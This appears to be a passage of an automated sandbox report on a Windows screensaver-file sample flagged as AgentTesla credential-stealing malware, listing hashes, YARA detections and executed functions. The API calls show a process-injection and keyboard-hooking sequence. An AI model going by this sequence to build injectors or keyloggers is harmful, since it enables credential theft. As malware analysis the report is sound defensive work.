Commandline:	"C:\Users\user\AppData\Roaming\microme09255.scr"
Imagebase:	0xde0000
File size:	857'600 bytes
MD5 hash:	75DC78C375DFEE9C0B96FA476BCD5D1C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 00000005.00000002.348836350.00000000047C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.348615893.000000000339A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.348615893.000000000339A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:05:50
Start date:	26/04/2024
Path:	C:\Users\user\AppData\Roaming\microme09255.scr
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\microme09255.scr"
Imagebase:	0xde0000
File size:	857'600 bytes
MD5 hash:	75DC78C375DFEE9C0B96FA476BCD5D1C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.883629068.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.883629068.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.883885788.0000000002310000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	03:06:09
Start date:	26/04/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	17.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	36.4%
Total number of Nodes:	33
Total number of Limit Nodes:	1

Executed Functions

Function 001C3D2F Relevance: 1.9, Strings: 1, Instructions: 619
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(, xrefs: 001C44F0

Memory Dump Source

Source File: 00000005.00000002.348087326.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_microme09255.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 447c743081b1429605599c02b156a2ac7e6c2db5af5c5185000a32cee4f67917
Instruction ID: 987c5243ebdaafddfe31975e665ce814443d4746445d7004eec32ca4c87506e3
Opcode Fuzzy Hash: 447c743081b1429605599c02b156a2ac7e6c2db5af5c5185000a32cee4f67917
Instruction Fuzzy Hash: 1352C174E052288FDB64DF65C994BDDBBB2AF99300F1085EAD409A7291DB34AE85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 001C4864 Relevance: 1.7, APIs: 1, Instructions: 226
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001C4A41

Memory Dump Source

Source File: 00000005.00000002.348087326.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_microme09255.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 86d64bafe44fd5ccd3852e2e70e774b1a634c1b4e29a94ae7309a5f3ed65d73e
Instruction ID: fcad48ac8525dc98251de6be0f04b6e2b36a96c547b2bb25097754536d725996
Opcode Fuzzy Hash: 86d64bafe44fd5ccd3852e2e70e774b1a634c1b4e29a94ae7309a5f3ed65d73e
Instruction Fuzzy Hash: 2181E2B4D002698FDB25CFA5C880BDDBBB5BF59300F1091AAE558B7260D7309E85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 001C4870 Relevance: 1.7, APIs: 1, Instructions: 220
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001C4A41

Memory Dump Source

Source File: 00000005.00000002.348087326.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_microme09255.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 2efe89219643949ff500b17775ee49afc0ed53d6a2063d3a5e6a41f8c3adc603
Instruction ID: c732f5d4a8f616aec49a64b8b91afe22642f4cede940367348d91d914542a572
Opcode Fuzzy Hash: 2efe89219643949ff500b17775ee49afc0ed53d6a2063d3a5e6a41f8c3adc603
Instruction Fuzzy Hash: A281D0B4D002298FEB24DFA5C980FDDBBB5BB59300F1091AAE518B7260DB309A85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 001C3910 Relevance: 1.6, APIs: 1, Instructions: 120
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001C39EB

Memory Dump Source

Source File: 00000005.00000002.348087326.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_microme09255.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 4192646d82c94d689a10baf467f3b845ad7fa58abf3d7c512f23b47363b30549
Instruction ID: 35ad6ecd0d44c395b6aaa79e6a1819abc9394eab37d5c3fd8e42aa2c373cedf8
Opcode Fuzzy Hash: 4192646d82c94d689a10baf467f3b845ad7fa58abf3d7c512f23b47363b30549
Instruction Fuzzy Hash: F441ACB5D012589FCF00CFA9D984AEEFBF1BB49314F20942AE814B7250D374AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 001C3918 Relevance: 1.6, APIs: 1, Instructions: 116
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001C39EB

Memory Dump Source

Source File: 00000005.00000002.348087326.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_microme09255.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: f19c395d2f90985070e032c3e59afbd5b68947193b0372fdc0556b226af51850
Instruction ID: b3d5a0e33313b970ae88e90e9e6409da46fe1ac699eda75aafc5f4bf8d0447b7
Opcode Fuzzy Hash: f19c395d2f90985070e032c3e59afbd5b68947193b0372fdc0556b226af51850
Instruction Fuzzy Hash: 9A419AB4D012589FCF00DFA9D984AEEFBF1BB49314F20942AE818B7250D774AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 001C4C98 Relevance: 1.6, APIs: 1, Instructions: 104
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001C4D4D

Memory Dump Source

Source File: 00000005.00000002.348087326.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_microme09255.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 7593537d392a0e5d95f223152fb8fd370c022db18b717bdb84025a59d1ebee1a
Instruction ID: d7991cfbc11a26fdc57e8ae65c4da98df4366aede081a31742b34fdf5b099500
Opcode Fuzzy Hash: 7593537d392a0e5d95f223152fb8fd370c022db18b717bdb84025a59d1ebee1a
Instruction Fuzzy Hash: 1F419AB9D042589FCF11CFAAD484ADEFBB5BB1A310F10906AE814B7210D335AA45CF65

Uniqueness

Uniqueness Score: -1.00%

Function 001C3A70 Relevance: 1.6, APIs: 1, Instructions: 101
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001C3B1A

Memory Dump Source

Source File: 00000005.00000002.348087326.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_microme09255.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fc3e15a1d5515561160de4f1eed7dbb14da1145a74f438b3fc2b57ca4fbeed3d
Instruction ID: 38db0affcdc16cec7825388cd907050b834f921a47eb3ae1414bb1c5a0afbe5e
Opcode Fuzzy Hash: fc3e15a1d5515561160de4f1eed7dbb14da1145a74f438b3fc2b57ca4fbeed3d
Instruction Fuzzy Hash: A83197B8D002589FCF10DFA9D984A9EFBB1AF59310F20942AE814B7210D735AA05CF59

Uniqueness

Uniqueness Score: -1.00%

Function 001C4CA0 Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001C4D4D

Memory Dump Source

Source File: 00000005.00000002.348087326.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_microme09255.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 903a75eda28c51f3a2c7ccf3b6a6eebca75e6a82667576cac369b3d853b0a686
Instruction ID: 455ec8d6417931fe68a03ebaf7f3eb895323bf9d77cd69530a52081a775402d1
Opcode Fuzzy Hash: 903a75eda28c51f3a2c7ccf3b6a6eebca75e6a82667576cac369b3d853b0a686
Instruction Fuzzy Hash: 0D3169B9D042589FCF10CFAAD984ADEFBB5BB59310F10902AE814B7210D375AA45CF65

Uniqueness

Uniqueness Score: -1.00%

Function 001C37F0 Relevance: 1.6, APIs: 1, Instructions: 94
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 001C389F

Memory Dump Source

Source File: 00000005.00000002.348087326.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_microme09255.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 60c3b0858c205954b186596805f038df1e75db1ab02b3c744596ceb0597c1a3c
Instruction ID: 3be278880f985fbe3c474faa4d62bebc3c07c014f93cb6b3f9aabb2df0fc4992
Opcode Fuzzy Hash: 60c3b0858c205954b186596805f038df1e75db1ab02b3c744596ceb0597c1a3c
Instruction Fuzzy Hash: 4531AEB4D002589FDB14DFAAD984AEEFBF1BF49314F24802AE814B7240D778AA45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 001C3B90 Relevance: 1.6, APIs: 1, Instructions: 73
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 001C3C0E

Memory Dump Source

Source File: 00000005.00000002.348087326.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_microme09255.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: d81d32303c9222dcfebdb50b7c13a8914a54c9c5deb40b7a16b26b3b8a9cfb20
Instruction ID: 70db0c6e40ca1cfd98901f5d89cb27091d27badc1084816f857d0ed8a504383d
Opcode Fuzzy Hash: d81d32303c9222dcfebdb50b7c13a8914a54c9c5deb40b7a16b26b3b8a9cfb20
Instruction Fuzzy Hash: D031AEB4D002189FCF14DFA9D584ADEFBB5AF49310F20941AE814B7350C735A945CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0016D204 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.348043733.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16d000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e1cb5f37d0bbc01d7b7caa2f6b9e10add0cbbddfd938dc92730dd27ccb5c1c9
Instruction ID: 3299a21591ab433a2d9499a64746e7adfff0d81f0c18b4bc1903d5749557813d
Opcode Fuzzy Hash: 8e1cb5f37d0bbc01d7b7caa2f6b9e10add0cbbddfd938dc92730dd27ccb5c1c9
Instruction Fuzzy Hash: 6221D0B2A04240DFEB05DF54EDD0B26BB65FB88324F34C56DE9054B246C336D866DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0016D1FF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.348043733.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16d000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a03215431c7700aa6d9f63b8d2e83db64d9b4d821f1e853ea9c686936a1dca5e
Instruction ID: e46e69a92f7490f9abe452c07af504f9902894eff6dcb2729874df963d18a305
Opcode Fuzzy Hash: a03215431c7700aa6d9f63b8d2e83db64d9b4d821f1e853ea9c686936a1dca5e
Instruction Fuzzy Hash: A911AF76904280CFDB15CF14D9C4B16BF61FB84324F24C5ADD8054B616C33AD86ACBA2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: microme09255.scrPID: 3204, Parent PID: 3176COMMON

Execution Graph

Execution Coverage:	11%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00398C00 Relevance: 2.8, Instructions: 2816COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96b8fa80efb55bdb53402c8d30ccea6e64793f84a74e95af0a65efe780573368
Instruction ID: 2da130817014c95ba177090104101c2c38c0b57e8f6a87f83a7d7ec2d6145d0d
Opcode Fuzzy Hash: 96b8fa80efb55bdb53402c8d30ccea6e64793f84a74e95af0a65efe780573368
Instruction Fuzzy Hash: DA53E731C10B1A8ADB51EF68C88469DF7B1FF99300F11D79AE459B7121EB70AAD4CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0039BE88 Relevance: 2.3, Instructions: 2310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 699b086a017c556f7e5c76d30c7b4d60e200bdc140bf1585f38f31aa7631d02b
Instruction ID: 6b9e79ba2f128ce376808e9b5c3a3bc22d473e70c717d05e6d4b96d3152f70f4
Opcode Fuzzy Hash: 699b086a017c556f7e5c76d30c7b4d60e200bdc140bf1585f38f31aa7631d02b
Instruction Fuzzy Hash: B7332C31D107198EDB11EF68C8846ADF7B1FF99300F15D79AE449AB211EB70AAC5CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0039E54A Relevance: 1.0, Instructions: 1043COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b898624b1de791b5fce91c938d8256bba09b5088551f10d012e4ed246a2c2c68
Instruction ID: 2ca67aa538beac816f9d38e7fa0e4caf35f693300dc2a77876e7898e5e1ec59d
Opcode Fuzzy Hash: b898624b1de791b5fce91c938d8256bba09b5088551f10d012e4ed246a2c2c68
Instruction Fuzzy Hash: 5DA20434A002188FDB25DB68C588B9DBBF2FB49314F5584AAE449EB361DB35ED81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0039F360 Relevance: .5, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 920ae77abd9865ae8afb5d00abd51186940e26961f19845e1d49cba095c29426
Instruction ID: 9bfddc869b33a0410af4d0573233b7d2322e630f90bea54efd43089309194fba
Opcode Fuzzy Hash: 920ae77abd9865ae8afb5d00abd51186940e26961f19845e1d49cba095c29426
Instruction Fuzzy Hash: D1323F30E106198FCF15EF75D89559DB7B6BFC9300F21C66AE409AB254EB70AE81CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00394518 Relevance: .3, Instructions: 266
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9c7baecdab96ddbd70c5772c0ecb150b2a0864b10b374904c5a077847607acd
Instruction ID: 4a1c4c000256c791413006de40b9329b55579f1e1290014a2c59ccd0fd665f92
Opcode Fuzzy Hash: c9c7baecdab96ddbd70c5772c0ecb150b2a0864b10b374904c5a077847607acd
Instruction Fuzzy Hash: F9B17170E10209CFDF15CFA9C885BDDBBF2AF89314F158529E814E7294EB759846CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00393900 Relevance: .2, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6177c3393a1a7723088ede93a62f5ecf7064aa1a17eabe5d651bc497874a5632
Instruction ID: 38599f98bc579a6b7d0c2e156a60ff3a28ea54d1bcb82266b07716722073fc86
Opcode Fuzzy Hash: 6177c3393a1a7723088ede93a62f5ecf7064aa1a17eabe5d651bc497874a5632
Instruction Fuzzy Hash: AE917EB0E00209CFDF15DFA9C8857DEBBF2AF88314F148529E405AB250DB749E45CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00929FF0 Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0092A073

Memory Dump Source

Source File: 00000006.00000002.883806168.0000000000920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_920000_microme09255.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 8914cba459f1f7b2cd52d6e2847e381bf61a5a143539ae9f55f0ff61540bc62b
Instruction ID: 1010d7f89495766346c758271be0f10221eb63258af16308c9b685acbc570ec2
Opcode Fuzzy Hash: 8914cba459f1f7b2cd52d6e2847e381bf61a5a143539ae9f55f0ff61540bc62b
Instruction Fuzzy Hash: C2213775D002588FCB11DF99D888BEEBBF5EF89310F20841AD415A7290C774A944CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 00929FF8 Relevance: 1.6, APIs: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0092A073

Memory Dump Source

Source File: 00000006.00000002.883806168.0000000000920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_920000_microme09255.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: fb5b80cb5b55dd33647bec415a790d0300dc15045db3f6734c668e9e2c4d4362
Instruction ID: 17e7df5dbf23e0b1b036846fd0a479ef666123b5e3f8baa55a1040f430568856
Opcode Fuzzy Hash: fb5b80cb5b55dd33647bec415a790d0300dc15045db3f6734c668e9e2c4d4362
Instruction Fuzzy Hash: 7D21F775D002199FCB14DF9AD848BEEFBF5FB89310F20841AE415A7250C774A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0039E3BD Relevance: 1.4, Strings: 1, Instructions: 110
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:, xrefs: 0039E3C0

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID: :
API String ID: 0-336475711
Opcode ID: b9396d6072a943d31b23c2be3967bb26277ae3a254f0d2996543277dd1e8613d
Instruction ID: 4a8d6227c90d7d73e070045f479a458cd49924d432088a6430f9ca90bdf8401e
Opcode Fuzzy Hash: b9396d6072a943d31b23c2be3967bb26277ae3a254f0d2996543277dd1e8613d
Instruction Fuzzy Hash: 2D41B1307002408FDF16AB39D49966E7BA3AB89310F25496ED406DB396DF39DD02CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00396590 Relevance: .6, Instructions: 575
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc19f09e7e9ea1f9d6a9c16dff3851ba1dac4c1c3c24204f61a93c19edbb2ce1
Instruction ID: f1222f7fec4bc16b25082714b492cb76ee0a328df1e1d5de35c27ff7541bd5df
Opcode Fuzzy Hash: fc19f09e7e9ea1f9d6a9c16dff3851ba1dac4c1c3c24204f61a93c19edbb2ce1
Instruction Fuzzy Hash: B7224B3471030ACBDF29AB28E59666832A2FBC5306B608939E005DB354DF75ED87DBC5

Uniqueness

Uniqueness Score: -1.00%

Function 00398028 Relevance: .4, Instructions: 355
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 840f1a3836f70615f3a015e650d7fbe03a6370fe13fe99d397804e55f46232cf
Instruction ID: 092f893460f1a41c9194a5f55f3c323e65d4a37d5d04b41fbd924ca6e0f73e59
Opcode Fuzzy Hash: 840f1a3836f70615f3a015e650d7fbe03a6370fe13fe99d397804e55f46232cf
Instruction Fuzzy Hash: 45D13D35A002048FDF15DF68D885AAEBBB2EF89310F15846AE806DB3A5DF35ED45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00395088 Relevance: .3, Instructions: 259
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdf57f1d50e283e82ae6f8ca15d5fb0492af185be5a98b769b3a86a5185af3c0
Instruction ID: 07647126c2d7f970bc6ef555e40cb83617c3e6055fc56c8ffb5f51971461402c
Opcode Fuzzy Hash: fdf57f1d50e283e82ae6f8ca15d5fb0492af185be5a98b769b3a86a5185af3c0
Instruction Fuzzy Hash: 34916C34B106158FDF16DB68C498BAE77B6EF89300F214569E406DB3A1DB75EC81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00398960 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8d88f9285f608f28a1a802168480089063195587ffe91680c085b1d37f3a729
Instruction ID: 0d4f88f780e92557c44685afdd03b7aa2ef9abafb2e47bfd4dc4196268de0882
Opcode Fuzzy Hash: e8d88f9285f608f28a1a802168480089063195587ffe91680c085b1d37f3a729
Instruction Fuzzy Hash: 51816C71A002058FDB15DF68D894B9DBBB1FF89310F14C16AE909AB395EB70DD45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00398390 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca5c6467ea48e701fd7339349bb13145392df735aab14b0aa805d3b495ab4c23
Instruction ID: b7037691f4ee81e1900406d0557607d8ee437db31a2059c1d791d83110992238
Opcode Fuzzy Hash: ca5c6467ea48e701fd7339349bb13145392df735aab14b0aa805d3b495ab4c23
Instruction Fuzzy Hash: 6641B234B002068FDF229F69D4C576EB7A6EBC6310F21482BE509CB381DB35EC868781

Uniqueness

Uniqueness Score: -1.00%

Function 0039E280 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3aee79b893de7274bb3bd903a3f009f197a9a47d7fbbc2db7bf8629e6e38fc9c
Instruction ID: c20cbb27872e64c68e22e28de4f0fd7108da8fef961f74294b18d6a4436cf1de
Opcode Fuzzy Hash: 3aee79b893de7274bb3bd903a3f009f197a9a47d7fbbc2db7bf8629e6e38fc9c
Instruction Fuzzy Hash: DB317034E146059FCF15DF68D8956AEBBF2AF89300F11852AE846EB350DB70AC42CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00398388 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd95d18e285d89b8df43dcb0a920ec829dc3a383a98f240dfcc2cd34e6113458
Instruction ID: bad4be6d189c8a91b1ca830e237d506a7ae8487653b717585764feb7dc10a8dc
Opcode Fuzzy Hash: fd95d18e285d89b8df43dcb0a920ec829dc3a383a98f240dfcc2cd34e6113458
Instruction Fuzzy Hash: 91319F75B001068BDF22DF69D4C566EBBA2EFC6310F25492AE509DB241CB34EC858781

Uniqueness

Uniqueness Score: -1.00%

Function 00395C28 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d817a154f701d51f49f80e996430c8f59ae9e1558acb9f90378f4194b4d54a4
Instruction ID: 6061c079136a0050f82c1654a3045e10daffe36035a801145f71446306617695
Opcode Fuzzy Hash: 2d817a154f701d51f49f80e996430c8f59ae9e1558acb9f90378f4194b4d54a4
Instruction Fuzzy Hash: 7D315031E007099BDF16DFA9D4847AEB7B2EF95300F218526E806FB240EB71AD81CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0039E290 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7e97a5ca174cd872b2b022c6ab3271b01197c5e5b5af956023e39dd4945aa7f
